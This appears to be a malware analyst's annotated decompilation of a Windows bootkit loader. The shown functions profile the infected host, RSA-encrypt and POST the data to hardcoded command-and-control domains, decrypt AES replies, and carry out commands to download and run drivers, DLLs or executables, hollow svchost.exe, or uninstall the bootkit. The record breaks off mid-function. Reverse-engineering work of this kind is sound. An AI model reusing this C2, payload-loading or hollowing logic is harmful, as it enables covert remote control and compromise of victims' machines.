return Query_Key_ValueData_140008144((const WCHAR *)CurrentVersion, (const WCHAR *)RegisteredOwner);// ret RegisteredOwner data
}
get_publicip_1400059FC
_WORD *__fastcall get_publicip_1400059FC(void *hSession)
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
v1 = 0i64;
v14 = 4;
LODWORD(v13) = 0;
v12 = 0;
if ( hSession )
{
// api.ipify.org
pswzServerName = deobfuscate_wstring(word_14000B188, 0xEu, 1);
hConnect = WinHttpConnect(hSession, pswzServerName, 0x50u, 0);
if ( hConnect )
{
// /
v5 = deobfuscate_wstring(word_14000B1A8, 2u, 0);
// GET
v6 = deobfuscate_wstring(word_14000B098, 4u, 0);
hRequest = WinHttpOpenRequest(hConnect, v6, v5, 0i64, 0i64, 0i64, 0);
hRequest1 = hRequest;
if ( hRequest )
{
if ( WinHttpSendRequest(hRequest, 0i64, 0, 0i64, 0, 0, 0i64) )
{
if ( WinHttpReceiveResponse(hRequest1, 0i64) )
{
if ( WinHttpQueryHeaders(hRequest1, 0x20000013u, 0i64, &v12, &v14, 0i64) )
{
if ( v12 == HTTP_STATUS_OK )
{
Data = (char *)get_HttpReadData(hRequest1, (unsigned int *)&v13);
if ( Data )
{
if ( (_DWORD)v13 )
{
Heap = RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, 8u, 2i64 * (unsigned int)(v13 + 1));
v1 = Heap;
if ( Heap )
str2wstr_140005424(Data, Heap);
}
RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, Data);
}
}
}
}
}
WinHttpCloseHandle(hRequest1);
}
WinHttpCloseHandle(hConnect);
}
}
return v1;
}
get_CurrentBuild_140005BA0
wchar_t *get_CurrentBuild_140005BA0()
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
// \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
v0 = deobfuscate_wstring(gCurrentVersion_14000B0E0, 0x3Fu, 1);
v1 = v14;
v2 = 64i64;
v3 = (char *)v0 - (char *)v14;
do
{
if ( v2 == -2147483582 )
break;
v4 = *(__int16 *)((char *)v1 + v3);
if ( !v4 )
break;
*v1++ = v4;
--v2;
}
while ( v2 );
v5 = v1 - 1;
if ( v2 )
v5 = v1;
*v5 = 0;
// CurrentBuild
v6 = deobfuscate_wstring(word_14000B1B0, 0xDu, 1);
v7 = 14i64;
v8 = (char *)v6 - (char *)v13;
v9 = v13;
do
{
if ( v7 == -2147483632 )
break;
v10 = *(__int16 *)((char *)v9 + v8);
if ( !v10 )
break;
*v9++ = v10;
--v7;
}
while ( v7 );
v11 = v9 - 1;
if ( v7 )
v11 = v9;
*v11 = 0;
return Query_Key_ValueData_140008144((const WCHAR *)v14, (const WCHAR *)v13);
}
get_ProcessorNameString_1400055A4
wchar_t *get_ProcessorNameString_1400055A4()
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
v0 = 65i64;
// \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0
v1 = deobfuscate_wstring(word_14000B1F0, 0x41u, 1);
v2 = v14;
v3 = (char *)v1 - (char *)v14;
do
{
if ( v0 == -2147483581 )
break;
v4 = *(__int16 *)((char *)v2 + v3);
if ( !v4 )
break;
*v2++ = v4;
--v0;
}
while ( v0 );
v5 = v2 - 1;
v6 = v0 == 0;
v7 = 20i64;
if ( !v6 )
v5 = v2;
*v5 = 0;
// ProcessorNameString
v8 = (char *)deobfuscate_wstring(word_14000B278, 0x14u, 1) - (char *)v13;
v9 = v13;
do
{
if ( v7 == -2147483626 )
break;
v10 = *(__int16 *)((char *)v9 + v8);
if ( !v10 )
break;
*v9++ = v10;
--v7;
}
while ( v7 );
v11 = v9 - 1;
if ( v7 )
v11 = v9;
*v11 = 0;
return Query_Key_ValueData_140008144((const WCHAR *)v14, (const WCHAR *)v13);
}
get_GPU_info_140005758
wchar_t *get_GPU_info_140005758()
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
// \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinSAT
v0 = deobfuscate_wstring(word_14000B2B0, 0x46u, 1);
v1 = v14;
v2 = 71i64;
v3 = (char *)v0 - (char *)v14;
do
{
if ( v2 == -2147483575 )
break;
v4 = *(__int16 *)((char *)v1 + v3);
if ( !v4 )
break;
*v1++ = v4;
--v2;
}
while ( v2 );
v5 = v1 - 1;
if ( v2 )
v5 = v1;
*v5 = 0;
// PrimaryAdapterString
v6 = deobfuscate_wstring(word_14000B340, 0x15u, 1);
v7 = 22i64;
v8 = (char *)v6 - (char *)v13;
v9 = v13;
do
{
if ( v7 == -2147483624 )
break;
v10 = *(__int16 *)((char *)v9 + v8);
if ( !v10 )
break;
*v9++ = v10;
--v7;
}
while ( v7 );
v11 = v9 - 1;
if ( v7 )
v11 = v9;
*v11 = 0;
return Query_Key_ValueData_140008144((const WCHAR *)v14, (const WCHAR *)v13);
}
get_RAM_GB_140005C78
__int64 get_RAM_GB_140005C78()
{
unsigned int v0; // ebx
struct _MEMORYSTATUSEX v2; // [rsp+20h] [rbp-48h] BYREF
v2.dwLength = 64;
v0 = 0;
if ( GlobalMemoryStatusEx(&v2) )
// 2^20-->K M
return (unsigned int)(v2.ullTotalPhys >> 20) / 1000;// GB
return v0;
}
get_ProductName_140005680
wchar_t *get_ProductName_140005680()
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
// \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
v0 = deobfuscate_wstring(gCurrentVersion_14000B0E0, 0x3Fu, 1);
v1 = v14;
v2 = 64i64;
v3 = (char *)v0 - (char *)v14;
do
{
if ( v2 == -2147483582 )
break;
v4 = *(__int16 *)((char *)v1 + v3);
if ( !v4 )
break;
*v1++ = v4;
--v2;
}
while ( v2 );
v5 = v1 - 1;
if ( v2 )
v5 = v1;
*v5 = 0;
// ProductName
v6 = deobfuscate_wstring(word_14000B1D0, 0xCu, 1);
v7 = 15i64;
v8 = (char *)v6 - (char *)v13;
v9 = v13;
do
{
if ( v7 == -2147483631 )
break;
v10 = *(__int16 *)((char *)v9 + v8);
if ( !v10 )
break;
*v9++ = v10;
--v7;
}
while ( v7 );
v11 = v9 - 1;
if ( v7 )
v11 = v9;
*v11 = 0;
return Query_Key_ValueData_140008144((const WCHAR *)v14, (const WCHAR *)v13);
}
get_IntegrityLevel_14000591C
// ucmShowProcessIntegrityLevel
__int64 get_IntegrityLevel_14000591C()
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
dwIntegrityLevel = 0;
TokenInformationLength = 0;
Handle = (HANDLE)-1i64;
if ( NtOpenProcessToken((HANDLE)0xFFFFFFFFFFFFFFFFi64, 0x18u, &Handle) >= 0 )
{
NtQueryInformationToken(Handle, TokenIntegrityLevel, 0i64, 0, &TokenInformationLength);
psid = (PSID *)RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, 8u, TokenInformationLength);
if ( psid )
{
if ( NtQueryInformationToken(Handle, TokenIntegrityLevel, psid, TokenInformationLength, &TokenInformationLength) >= 0 )
{
AccountSubAuthorityCount = RtlSubAuthorityCountSid(*psid);
// if (dwIntegrityLevel == SECURITY_MANDATORY_LOW_RID)
// {
// t = L"Low Process";
// }
// else if (dwIntegrityLevel >= SECURITY_MANDATORY_MEDIUM_RID &&
// dwIntegrityLevel < SECURITY_MANDATORY_HIGH_RID)
// {
// t = L"Medium Process";
// }
// else if (dwIntegrityLevel >= SECURITY_MANDATORY_HIGH_RID)
// {
// t = L"High Integrity Process";
// }
// else if (dwIntegrityLevel >= SECURITY_MANDATORY_SYSTEM_RID)
// {
// t = L"System Integrity Process";
// }
dwIntegrityLevel = *RtlSubAuthoritySid(*psid, (unsigned __int8)(*AccountSubAuthorityCount - 1));
}
RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, psid);
}
}
if ( Handle )
NtClose(Handle);
return dwIntegrityLevel;
}
rsaenc_base64_140001370
CHAR *__fastcall rsaenc_base64_140001370(const WCHAR *indata)
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
pcbStructInfo = 550;
v25 = 0i64;
v2 = 0i64;
phKey = 0i64;
pbInput = 0i64;
pvStructInfo = 0i64;
v4 = 4i64;
pcbResult = 0;
pcchString = 0;
Heap = 0i64;
v6 = pbEncoded;
// openssl rsa -pubin -inform der -in rsakey_X509_14000A0D0.der -noout -text
// Public-Key: (4095 bit)
// Modulus:
// 43:43:71:5d:2c:12:70:e2:50:d5:67:e4:05:02:01:
// eb:2e:2a:48:c2:b3:31:9c:96:9e:eb:6a:0c:d6:e6:
// 55:bd:cc:2f:b8:ad:0f:5d:3c:0f:50:68:90:c3:69:
// 76:aa:9b:c8:f5:0b:3d:bd:0f:ac:8f:fc:b9:bb:b7:
// 6c:54:c8:2c:c7:46:3e:cc:41:31:ba:76:bd:f0:ea:
// aa:2b:cd:ae:57:7b:3a:24:7f:82:f4:d6:01:5f:f0:
// 02:80:ed:ee:28:e7:9c:17:95:08:3f:db:1b:be:60:
// 24:6d:ab:3d:3b:e2:87:e6:4c:b6:11:7a:05:6c:be:
// 7b:47:a3:0b:72:72:7e:b9:86:b0:e5:66:c6:ad:2f:
// b7:6b:0c:c6:f4:a3:a6:1b:01:d2:a9:bc:99:96:0e:
// a1:3f:d7:a2:df:0c:2c:ef:38:f4:e3:14:16:a2:37:
// 44:0a:48:ae:0f:cc:bc:00:ec:28:29:c2:ba:26:32:
// d0:8c:9e:e7:9c:8b:ea:79:46:dd:2a:df:3f:6e:62:
// d6:e2:31:3c:1d:4d:83:53:d9:fb:ef:45:04:0e:34:
// 50:59:65:84:57:c9:a7:87:76:93:b4:7a:c8:9d:86:
// a5:e6:98:15:cd:23:5c:1d:d4:cc:3c:b3:35:54:0e:
// 8f:79:29:61:c7:5c:e0:55:61:71:e4:d5:d6:22:c9:
// 5e:98:56:45:96:a6:4b:0e:ac:ac:ce:9b:36:11:d8:
// f1:cd:bf:01:55:34:2b:8a:2c:9e:4a:48:7c:8f:97:
// 24:16:11:0f:1d:85:5c:d0:8c:c3:1c:51:83:a2:af:
// b4:61:e8:b8:d3:65:3b:1d:ec:fb:32:a6:7c:10:7d:
// 9d:c7:3d:7e:c8:f6:6c:16:a9:83:f2:42:a3:9e:1f:
// 68:e8:88:a4:b4:1e:35:5c:b8:f3:59:8a:de:84:30:
// 79:c5:ea:1e:e5:25:3f:fe:17:7a:ed:85:2f:c2:7d:
// 03:34:f3:f6:64:4b:85:47:d0:cb:a6:72:71:43:bf:
// a0:ef:d0:73:92:cb:a9:61:52:c9:d2:f7:05:b8:9b:
// c9:28:f3:db:dc:0e:e1:dd:8f:24:98:a5:3c:f1:07:
// cb:55:58:9d:92:c2:e8:83:0c:9a:eb:f4:fa:15:6f:
// 8b:d5:d5:69:a4:12:3a:72:78:b1:5b:2d:c1:40:96:
// 28:37:6d:05:c9:0e:a8:f6:9b:66:1a:ce:86:55:5c:
// 96:85:03:79:59:c1:51:c6:17:d9:1a:82:cb:88:ca:
// d9:15:b8:50:a8:38:1d:d7:d3:b9:f7:5a:6c:9a:d2:
// 4d:d2:7d:cf:37:9c:15:2e:b2:51:e4:97:da:41:9b:
// 1a:96:f2:5b:bf:31:ff:ff:0a:b3:7b:3e:81:eb:14:
// d8:87
// Exponent: 65537 (0x10001)
v7 = rsakey_X509_14000A0D0;
do
{
v8 = *((_OWORD *)v7 + 1);
*(_OWORD *)v6 = *(_OWORD *)v7;
v9 = *((_OWORD *)v7 + 2);
*((_OWORD *)v6 + 1) = v8;
v10 = *((_OWORD *)v7 + 3);
*((_OWORD *)v6 + 2) = v9;
v11 = *((_OWORD *)v7 + 4);
*((_OWORD *)v6 + 3) = v10;
v12 = *((_OWORD *)v7 + 5);
*((_OWORD *)v6 + 4) = v11;
v13 = *((_OWORD *)v7 + 6);
*((_OWORD *)v6 + 5) = v12;
v14 = *((_OWORD *)v7 + 7);
v7 += 128;
*((_OWORD *)v6 + 6) = v13;
v6 += 128;
*((_OWORD *)v6 - 1) = v14;
--v4;
}
while ( v4 ); // 0x80*4
v15 = *((_DWORD *)v7 + 8);
v16 = *((_OWORD *)v7 + 1);
*(_OWORD *)v6 = *(_OWORD *)v7;
*((_OWORD *)v6 + 1) = v16;
*((_DWORD *)v6 + 8) = v15;
v6[36] = v7[36];
v17 = WideCharToMultiByte(CP_UTF8, 0, indata, -1, 0i64, 0, 0i64, 0i64);
sz = v17;
if ( v17 )
{
lpMultiByteStr = (CHAR *)RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, 8u, v17);
pbInput = (UCHAR *)lpMultiByteStr;
if ( lpMultiByteStr )
{
if ( WideCharToMultiByte(CP_UTF8, 0, indata, -1, lpMultiByteStr, sz, 0i64, 0i64) )// TO UTF8
{
// RSA
v20 = deobfuscate_wstring(word_14000A068, 4u, 1);
if ( BCryptOpenAlgorithmProvider(&v25, v20, 0i64, 0) >= 0 )
{
if ( CryptDecodeObjectEx(
0x10001u, // X509_ASN_ENCODING | PKCS_7_ASN_ENCODING
(LPCSTR)X509_PUBLIC_KEY_INFO,
pbEncoded,
pcbStructInfo,
0x8005u, // CRYPT_DECODE_ALLOC_FLAG|CRYPT_DECODE_NOCOPY_FLAG|CRYPT_DECODE_SHARE_OID_STRING_FLAG
// #define CRYPT_DECODE_NOCOPY_FLAG 0x1
// #define CRYPT_DECODE_SHARE_OID_STRING_FLAG 0x4
0i64,
&pvStructInfo,
&pcbStructInfo) )
{
// X509_ASN_ENCODING
if ( CryptImportPublicKeyInfoEx2(1u, pvStructInfo, 0, 0i64, &phKey) )
{
BCryptEncrypt(phKey, pbInput, sz - 1, 0i64, 0i64, 0, 0i64, 0, &pcbResult, BCRYPT_PAD_PKCS1);
Heap = (BYTE *)RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, 8u, pcbResult);
if ( Heap )
{
if ( BCryptEncrypt(phKey, pbInput, sz - 1, 0i64, 0i64, 0, Heap, pcbResult, &pcbResult, BCRYPT_PAD_PKCS1) >= 0 )
{
CryptBinaryToStringA(Heap, pcbResult, 0x40000001u, 0i64, &pcchString);
if ( pcchString )
{
v2 = RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, 8u, 2i64 * (pcchString + 1));
if ( v2 )
{
// CRYPT_STRING_NOCRLF
// 0x40000000
// CRYPT_STRING_BASE64
// 0x00000001
if ( !CryptBinaryToStringA(Heap, pcbResult, 0x40000001u, (LPSTR)v2, &pcchString) )
{
RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, v2);
v2 = 0i64;
}
}
}
}
}
}
}
}
}
}
}
if ( phKey )
BCryptDestroyKey(phKey);
if ( Heap )
RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, Heap);
if ( pvStructInfo )
RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, pvStructInfo);
if ( pbInput )
RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, pbInput);
return (CHAR *)v2;
}
urlenc_140005498
_BYTE *__fastcall urlenc_140005498(_BYTE *data, int flag)
{
_BYTE *Heap; // rsi
unsigned int size; // edi
_BYTE *i; // rax
int v7; // ebx
char *v8; // r8
__int64 v9; // r9
char v10; // cl
__int64 v11; // rdx
_BYTE *v12; // rax
__int64 v13; // rbx
Heap = 0i64;
size = 0;
for ( i = data; *i; ++size )
++i;
v7 = 0;
if ( size )
{
Heap = RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, 8u, size + 2 * size + 1);
if ( Heap )
{
v8 = data;
v9 = size;
// urlenc
while ( 1 )
{
v10 = *v8;
v11 = (unsigned int)(v7 + 1);
v12 = &Heap[v7];
if ( *v8 == '+' )
{
*v12 = '%';
v13 = (unsigned int)(v7 + 2);
Heap[v11] = '2';
Heap[v13] = 'B';
goto LABEL_13;
}
if ( v10 == '/' )
break;
if ( v10 == '=' )
{
*v12 = '%';
v13 = (unsigned int)(v7 + 2);
Heap[v11] = '3';
Heap[v13] = 'D';
LABEL_13:
v7 = v13 + 1;
goto LABEL_14;
}
*v12 = v10;
++v7;
LABEL_14:
++v8;
if ( !--v9 )
goto LABEL_15;
}
*v12 = '%';
v13 = (unsigned int)(v7 + 2);
Heap[v11] = '2';
Heap[v13] = 'F';
goto LABEL_13;
}
}
LABEL_15:
if ( flag )
RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, data);
return Heap;
}
do_1400049F4
先发送获取的信息,再接受指令
__int64 __fastcall do_1400049F4(HttpST *httpst, _BYTE *data)
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
Str = data;
data_1 = 0i64;
v23 = 4;
v28 = 0;
LODWORD(recvsize) = 0;
wstr1 = 0i64;
decsz = 0;
ws = 0i64;
errorcode = 0;
if ( !(unsigned int)init_httpst_140004614(httpst) )
{
errorcode = 2;
goto ROUND;
}
hConnect = WinHttpConnect(
httpst->hSession,
httpst->DataST_20.pswzServerName,
httpst->DataST_20.sslflag != 0 ? 443 : 80,
0);
p_hConnect = &httpst->hConnect;
httpst->hConnect = hConnect;
if ( !hConnect )
goto ROUND;
// #define WINHTTP_FLAG_SECURE 0x00800000 // use SSL if applicable (HTTPS)
// #define WINHTTP_FLAG_BYPASS_PROXY_CACHE 0x00000100 // add "pragma: no-cache" request header
dwFlags = httpst->DataST_20.sslflag != 0 ? 0x800100 : 0x100;
// POST
pwszVerb = deobfuscate_wstring(POST_14000AFE0, 5u, 1);
hRequest = WinHttpOpenRequest(httpst->hConnect, pwszVerb, httpst->DataST_20.pwszObjectName, 0i64, 0i64, 0i64, dwFlags);
p_hRequest = &httpst->hRequest;
httpst->hRequest = hRequest;
if ( !hRequest )
goto ROUND;
SECURITY_flag = 0x3300;
// #define WINHTTP_OPTION_SECURITY_FLAGS 31
if ( !WinHttpSetOption(hRequest, 0x1Fu, &SECURITY_flag, 4u) )
goto ROUND;
// Content-Type: application/x-www-form-urlencoded
v11 = deobfuscate_wstring(Content_Type_14000AFF0, 0x30u, 1);
v12 = strlen(Str);
v13 = strlen(Str);
if ( !WinHttpSendRequest(*p_hRequest, v11, 0xFFFFFFFF, Str, v13, v12, 0i64) )
goto ROUND;
if ( !WinHttpReceiveResponse(*p_hRequest, 0i64) )
goto ROUND;
if ( !WinHttpQueryHeaders(*p_hRequest, 0x20000013u, 0i64, &v28, &v23, 0i64) )
goto ROUND;
if ( v28 != HTTP_STATUS_OK )
goto ROUND;
// c2回复包 magic 'HP'
recvdata = (char *)get_HttpReadData(*p_hRequest, (unsigned int *)&recvsize);
data_1 = recvdata;
if ( !recvdata
|| (recvsize1 = recvsize, (unsigned int)recvsize < 2)
|| *recvdata != 'H'
|| recvdata[1] != 'P'
|| (HWID_MAC_VolumeSerialNumber_md5wstr = get_HWID_MAC_VolumeSerialNumber_md5wstr(),
(ws = HWID_MAC_VolumeSerialNumber_md5wstr) == 0i64)
|| (unsigned int)wcslen(HWID_MAC_VolumeSerialNumber_md5wstr) != 32
|| (wstr2str_140005380(ws, s),
(decdata = (char *)AESCBC256_dec_recvdata_140001060(data_1 + 2, s, recvsize1 - 2, &decsz)) == 0i64)
|| !decsz
|| (wstr = (wchar_t *)RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, 8u, 2i64 * (unsigned int)(decsz + 10)),
(wstr1 = wstr) == 0i64) )
{
ROUND:
++httpst->RoundIndex;
v19 = &httpst->hConnect;
p_hRequest = &httpst->hRequest;
if ( !ws )
goto LABEL_22;
goto LABEL_21;
}
str2wstr_140005424(decdata, wstr);
docommand_140006A38(httpst, wstr1, &errorcode);
v19 = p_hConnect;
LABEL_21:
RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, ws);
LABEL_22:
if ( wstr1 )
RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, wstr1);
if ( data_1 )
RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, data_1);
if ( *v19 )
{
WinHttpCloseHandle(*v19);
*v19 = 0i64;
}
if ( *p_hRequest )
{
WinHttpCloseHandle(*p_hRequest);
*p_hRequest = 0i64;
}
return errorcode;
}
init_httpst_140004614
轮询host
__int64 __fastcall init_httpst_140004614(HttpST *httpst)
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
v1 = 0;
ptr = &httpst->DataST_20;
// I love you hasherezade <3
deobfuscate_wstring(word_14000AE90, 0x1Au, 1);
// I was secretly hoping we could be friends
deobfuscate_wstring(word_14000AED0, 0x2Au, 1);
// frassirishiproc.com
urls[0].wshost = deobfuscate_wstring(frassirishiproc_com_14000AF28, 0x14u, 0);
// /API/hpb_gate.php
urls[0].wspath = deobfuscate_wstring(API_hpb_gate_php_14000AF58, 0x12u, 0);
urls[0].sslflag = 1;
urls[0].flag3 = 2;
// heikickgn.com
urls[1].wshost = deobfuscate_wstring(heikickgn_com_14000AF80, 0xEu, 0);
urls[1].wspath = deobfuscate_wstring(API_hpb_gate_php_14000AF58, 0x12u, 0);
urls[1].sslflag = 1;
urls[1].flag3 = 3;
urls[2].wshost = deobfuscate_wstring(heikickgn_com_14000AF80, 0xEu, 0);
urls[2].wspath = deobfuscate_wstring(API_hpb_gate_php_14000AF58, 0x12u, 0);
index = ptr->index;
urls[2].sslflag = 1;
if ( httpst->RoundIndex == index )
return 1;
freebuf_1400073F4(ptr);
i = ptr->index;
if ( ptr->index <= 2u )
{
i1 = i;
ptr->index = i + 1;
v7 = wcslen(urls[i1].wshost);
Heap = (wchar_t *)RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, 8u, 2i64 * (unsigned int)(v7 + 1));
ptr->pswzServerName = Heap;
if ( Heap )
{
v9 = wcslen(urls[i1].wspath);
v10 = (wchar_t *)RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, 8u, 2i64 * (unsigned int)(v9 + 1));
ptr->pwszObjectName = v10;
if ( v10 )
{
if ( urls[i1].wshost && urls[i1].wspath )
{
v11 = wcslen(urls[i1].wshost);
wcsncpy_0(ptr->pswzServerName, (const wchar_t *)(unsigned int)(v11 + 1), (size_t)urls[i1].wshost);
v12 = wcslen(urls[i1].wspath);
wcsncpy_0(ptr->pwszObjectName, (const wchar_t *)(unsigned int)(v12 + 1), (size_t)urls[i1].wspath);
ptr->sslflag = urls[i1].sslflag;
return 1;
}
}
}
}
return v1;
}
AESCBC256_dec_recvdata_140001060
PVOID __fastcall AESCBC256_dec_recvdata_140001060(const CHAR *data, UCHAR *key, DWORD datasz, _DWORD *decsz)
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
v21 = 0i64;
v22 = 0i64;
v17 = 0;
v18 = 0;
v19 = 0;
v8 = 0i64;
v20 = 0;
v9 = 0i64;
CryptStringToBinaryA(data, datasz, 1u, 0i64, &v17, 0i64, 0i64);
if ( v17 )
{
Heap = (UCHAR *)RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, 8u, v17);
if ( Heap )
{
if ( CryptStringToBinaryA(data, datasz, 1u, Heap, &v17, 0i64, 0i64) )
{
// AES
v11 = deobfuscate_wstring(word_14000A078, 4u, 1);
if ( BCryptOpenAlgorithmProvider(&v21, v11, 0i64, 0) >= 0 )
{
// ChainingModeCBC
v12 = (UCHAR *)deobfuscate_wstring(word_14000A088, 0x10u, 0);
// ChainingMode
v13 = deobfuscate_wstring(word_14000A0B0, 0xDu, 0);
if ( BCryptSetProperty(v21, v13, v12, 0x20u, 0) >= 0 )
{
// ObjectLength
v14 = deobfuscate_wstring(ObjectLength_14000A010, 0xDu, 1);
if ( BCryptGetProperty(v21, v14, (PUCHAR)&v19, 4u, &v20, 0) >= 0 )
{
v15 = (UCHAR *)RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, 8u, v19);
v9 = v15;
if ( v15 )
{
if ( BCryptGenerateSymmetricKey(v21, &v22, v15, v19, key, 0x20u, 0) >= 0 )
{
BCryptDecrypt(v22, Heap, v17, 0i64, 0i64, 0, 0i64, 0, &v18, 1u);
if ( v18 )
{
v8 = RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, 8u, v18 + 10);
if ( v8 )
{
if ( BCryptDecrypt(v22, Heap, v17, 0i64, 0i64, 0, (PUCHAR)v8, v18, &v18, 1u) >= 0 )
{
*decsz = v18;
}
else
{
RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, v8);
v8 = 0i64;
}
}
}
}
}
}
}
}
}
RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, Heap);
}
}
if ( v22 )
BCryptDestroyKey(v22);
if ( v9 )
RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, v9);
if ( v21 )
BCryptCloseAlgorithmProvider(v21, 0);
return v8;
}
docommand_140006A38
Type
1 加载sys、exe、dll
2 通过svchost.exe-hollow,加载exe、dll,并卸载bootkit
3 卸载bootkit
Method == '2' 则保存文件到ProgramData,'1'内存加载
char __fastcall docommand_140006A38(HttpST *httpst, wchar_t *recvdata, _DWORD *isSuccess)
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
memset(&wsvalue, 0, sizeof(wsvalue));
// "interval":
v6 = deobfuscate_wstring(word_14000B660, 0xCu, 1);
v7 = getvalue_1400051A4(recvdata, v6); // 回联间隔
v8 = v7;
if ( v7 )
{
v9 = 1000 * wtoi((const wchar_t *)v7);
v10 = 60000; // 默认为60s
if ( v9 )
v10 = v9;
httpst->sleep_dwMilliseconds = v10;
do
{
recvdata = getValue_and_Aeskey_140007090(recvdata, &wsvalue);
if ( !recvdata
|| !wsvalue.Type
|| !wsvalue.Method
|| !wsvalue.File
|| !wsvalue.FileType
|| !wsvalue.auth_token
|| !wsvalue.aes_key )
{
break;
}
switch ( *wsvalue.Type )
{
case '1':
command_type1_140006318(httpst, &wsvalue);// Download and execute a kernel driver, DLL, or a regular executable
break;
case '2':
command_type2_140006BB0(httpst, &wsvalue, isSuccess);// Download a payload, uninstall the bootkit, and execute the payload – likely used to update the bootkit
break;
case '3': // 'U'
command_type3_140006B78(isSuccess); // Uninstall the bootkit and exit
break;
}
free_WsValue_14000744C(&wsvalue);
}
while ( *isSuccess != 1 );
LOBYTE(v7) = RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, v8);
}
return (char)v7;
}
getValue_and_Aeskey_140007090
wchar_t *Type;
wchar_t *Method;
wchar_t *File;
wchar_t *cmd_line_b64dec;
wchar_t *User;
wchar_t *FileType;
wchar_t *auth_token;
wchar_t *aes_key;
wchar_t *__fastcall getValue_and_Aeskey_140007090(const wchar_t *recvdata, WsValue *a2)
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
aeskey = 0i64;
v24 = 0;
Heap = 0i64;
memset(a2, 0, sizeof(WsValue));
// {"Type":
v6 = deobfuscate_wstring(word_14000B6F0, 9u, 1);
v7 = getvalue_1400051A4(recvdata, v6);
a2->Type = (wchar_t *)v7;
if ( !v7 )
goto LABEL_18;
// "Method":
v8 = deobfuscate_wstring(word_14000B708, 0xAu, 1);
v9 = getvalue_1400051A4(recvdata, v8);
a2->Method = (wchar_t *)v9;
if ( !v9 )
goto LABEL_18;
// "File":"
v10 = deobfuscate_wstring(word_14000B720, 9u, 1);
v11 = getvalue_1400051A4(recvdata, v10);
a2->File = (wchar_t *)v11;
if ( !v11 )
goto LABEL_18;
// "FileType":"
v12 = deobfuscate_wstring(word_14000B738, 0xDu, 1);
v13 = getvalue_1400051A4(recvdata, v12);
a2->FileType = (wchar_t *)v13;
if ( !v13 )
goto LABEL_18;
if ( (unsigned int)wcslen((wchar_t *)v13) < 3 )
goto LABEL_18;
// "User":
v14 = deobfuscate_wstring(word_14000B758, 8u, 1);
v15 = getvalue_1400051A4(recvdata, v14);
a2->User = (wchar_t *)v15;
if ( !v15 )
goto LABEL_18;
// "auth_token":"
v16 = deobfuscate_wstring(word_14000B770, 0xFu, 1);
v17 = getvalue_1400051A4(recvdata, v16);
a2->auth_token = (wchar_t *)v17;
if ( !v17 )
goto LABEL_18;
// "cmd_line":"
v18 = deobfuscate_wstring(word_14000B790, 0xDu, 1);
v19 = getvalue_1400051A4(recvdata, v18);
if ( !v19 )
goto LABEL_18;
CryptStringToBinaryW((LPCWSTR)v19, 0, 1u, 0i64, &v24, 0i64, 0i64);
if ( v24 )
{
Heap = (char *)RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, 8u, v24 + 10);
if ( Heap )
{
// CRYPT_STRING_BASE64
// 0x00000001
if ( CryptStringToBinaryW((LPCWSTR)v19, 0, 1u, (BYTE *)Heap, &v24, 0i64, 0i64) )
{
v20 = (wchar_t *)RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, 8u, 2i64 * (v24 + 10));
a2->cmd_line_b64dec = v20;
if ( v20 )
{
str2wstr_140005424(Heap, v20);
// "aes_key":"
v21 = deobfuscate_wstring(word_14000B7B0, 12u, 1);
v22 = getvalue_1400051A4(recvdata, v21);
a2->aes_key = (wchar_t *)v22;
if ( v22 )
aeskey = wcsstr(recvdata, v21) + 12;
}
}
}
}
RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, v19);
if ( Heap )
RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, Heap);
if ( !aeskey )
LABEL_18:
free_WsValue_14000744C(a2);
return aeskey;
}
command_type1_140006318
void __fastcall command_type1_140006318(HttpST *httpst, WsValue *wsvalue)
{
